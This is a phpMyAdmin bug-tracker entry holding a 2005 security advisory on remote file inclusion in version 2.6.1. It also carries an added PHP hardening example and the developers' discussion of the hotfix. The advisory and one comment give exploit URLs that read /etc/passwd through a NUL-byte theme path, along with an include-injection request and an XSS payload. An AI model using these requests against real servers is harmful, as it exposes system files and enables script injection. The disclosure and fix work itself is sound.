#1609 (in 2.6.1-pl1) Remote file inclusion

2.6.1
invalid
None
1
2014-08-19
2005-02-22
No

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin 2.6.1 Remote file inclusion cXIb8O3.4]

Author: cXIb8O3
Date: 21.2.2005

- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

- --- 1. Remote file inclusion ---

1.0

This bug exists in css/phpmyadmin.css.php. You can
include files. The error exists in

Code:
- ------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
    $theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
    include($tmp_file);
} // end of include theme_right.css.php
- ------

And now you can get files.

For example:

http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00

1.1
Or the next include is in libraries/database_interface.lib.php

Code:

- ---
18# require_once('./libraries/dbi/' .
$cfg['Server']['extension'] . '.dbi.lib.php');
- ---

For example:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3

Error message :
- ---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18

Fatal error: main() [function.require]: Failed opening
required './libraries/dbi/cXIb8O3.dbi.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
- ---------------

Or, if you want and if you see the PHP error, you can make
XSS with the PHP bug. For example:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E

- --- 2. How to fix ---

Download the new version of the script or update.

- --- 3. Greets ---

sp3x.

i need help.. :(

- --- 4.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCG5WfznmvyJCR4zQRAjwxAJ9iJkCGyD5HPMCbOjYb1WdR9HEcdwCgkHLO
2FuB5Nqz2rMTa1b26PMgzrk=
=oyWn
-----END PGP SIGNATURE-----
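
Added example (not from the report and not phpMyAdmin's own code): both include sites above build a path from request-controlled variables, so this PHP code shows a request-variable import that refuses reserved names, a theme path check that rejects NUL bytes and traversal, and an allowlist for the database extension. All function names are hypothetical, and the `mysql`/`mysqli` extension list is an assumption.

```php
<?php
// Added illustration; every function name here is hypothetical, not phpMyAdmin's.
// Names a request must never be allowed to define or overwrite.
const RESERVED_NAMES = ['GLOBALS', 'cfg', '_GET', '_POST', '_COOKIE',
                        '_SERVER', '_ENV', '_FILES', '_REQUEST', '_SESSION'];

// Copy request parameters into $target, skipping reserved names, so that
// GLOBALS[cfg][ThemePath]=... and cfg[Server][extension]=... are ignored.
function import_request_vars(array $source, array &$target): void {
    foreach ($source as $name => $value) {
        if (!is_string($name) || in_array($name, RESERVED_NAMES, true)
            || array_key_exists($name, $target)) {
            continue; // reserved, numeric, or already defined by the application
        }
        $target[$name] = $value;
    }
}

// A path component must be a plain name: no NUL byte, slash, or "..".
function is_plain_name($value): bool {
    return is_string($value)
        && preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $value) === 1;
}

// Return the theme stylesheet path, or null when the request must be refused.
function theme_css_path(string $themeRoot, $theme): ?string {
    if (!is_plain_name($theme)) {
        return null;
    }
    $root = realpath($themeRoot);
    $file = realpath($themeRoot . '/' . $theme . '/css/theme_right.css.php');
    // After symlink resolution the file must still sit under the theme root.
    $inside = $root !== false && $file !== false
        && strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0;
    return $inside ? $file : null;
}

// The database extension is a closed set (assumed here: mysql, mysqli).
function dbi_library_path($extension): ?string {
    return in_array($extension, ['mysql', 'mysqli'], true)
        ? './libraries/dbi/' . $extension . '.dbi.lib.php' : null;
}

// Constructed request mirroring the parameters in the report.
$state = ['cfg' => ['ThemePath' => './themes']];
import_request_vars(['GLOBALS' => ['cfg' => ['ThemePath' => '/etc']],
                     'theme' => "passwd\0"], $state);
var_dump($state['cfg']['ThemePath'], theme_css_path('./themes', $state['theme']),
         dbi_library_path('cXIb8O3'));
```

A caller includes a file only when these functions return a non-null path, and otherwise falls back to a fixed default.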

Discussion

  • Maksymilian Arciemowicz

    • priority: 5 --> 7
     
  • Alexander M. Turek

    • priority: 7 --> 5
     
  • Alexander M. Turek

    • summary: [phpMyAdmin 2.6.1 Remote file inclusion cXIb8O3.4] --> (2.6.1) Remote file inclusion
     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Bug confirmed.

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Maksymilian,

    Thank you for your report.

    Could you please give the attached file a try? It's a
    modified version of "libraries/grab_globals.lib.php" that
    contains a hotfix against your exploit.

     
  • Alexander M. Turek

    • assigned_to: nobody --> rabus
     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    /css/phpmyadmin.css.php?js_frame=print&theme=/etc/passwd%00&&GLOBALS[cfg][ThemePath]=X

     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    /css/phpmyadmin.css.php?js_frame=print&theme=/etc/passwd%00&&GLOBALS[cfg][ThemePath]=X
    On my machine the bug exists with this
    libraries/grab_globals.lib.php. Variable $theme

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    OK, I missed catching $GLOBALS. Please try the attached
    revision of grab_globals.lib.php.

     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    ok ;] is good but now xss... check.. this xss..

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    > ok ;]

    OK then, let's consider this as fixed for now, although I
    don't like the way I did it. ;-)

    > is good but now xss... check.. this xss..

    Hey, I'm doing this in my free time, buddy. On top of that, I
    don't want to fail my computer science exam, tomorrow. Don't
    rush me. :-)

     
  • Alexander M. Turek

    • priority: 5 --> 1
    • summary: (2.6.1) Remote file inclusion --> (in 2.6.2) Remote file inclusion
    • status: open --> open-fixed
     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    i sit in my i386 18/24 H . Is 2.6.2 final? I see only 2.6.1
    release. And this bug is critical because many servers have
    phpMyAdmin... i am waiting for a new version with patch :)

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    No, 2.6.2 is far away from being final. I think, this bug
    will force us to have a 2.6.1-pl1 release.

    If you need a quick fix, you can use the patched
    grab_globals.lib.php or checkout the QA_2_6_1 branch from CVS.

     
  • Alexander M. Turek

    • labels: --> 509104
     
  • Marc Delisle

    Marc Delisle - 2005-02-23

    Logged In: YES
    user_id=210714

    I cannot reproduce the XSS problem with your exploit,
    using unpatched phpMyAdmin 2.6.1.
    To work, it should display a message between <h1></h1> ?
    I don't see this happening.

     
  • Marc Delisle

    Marc Delisle - 2005-02-23
    • labels: 509104 -->
     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Maksymilian,

    our CVS demo is outdated because of cron job problems at SF.
    This one should be more up to date:

    http://rabus.phpmyadmin.net/demos/CVS_LATEST

    By the way, we are still waiting for an answer from you to
    bug #1149383. :-)

     
  • Alexander M. Turek

    • summary: (in 2.6.2) Remote file inclusion --> (in 2.6.1-pl1) Remote file inclusion
     
  • Alexander M. Turek

    • status: open-fixed --> closed-fixed
     
  • Michal Čihař

    Michal Čihař - 2013-06-11
    • Status: closed-fixed --> invalid
     
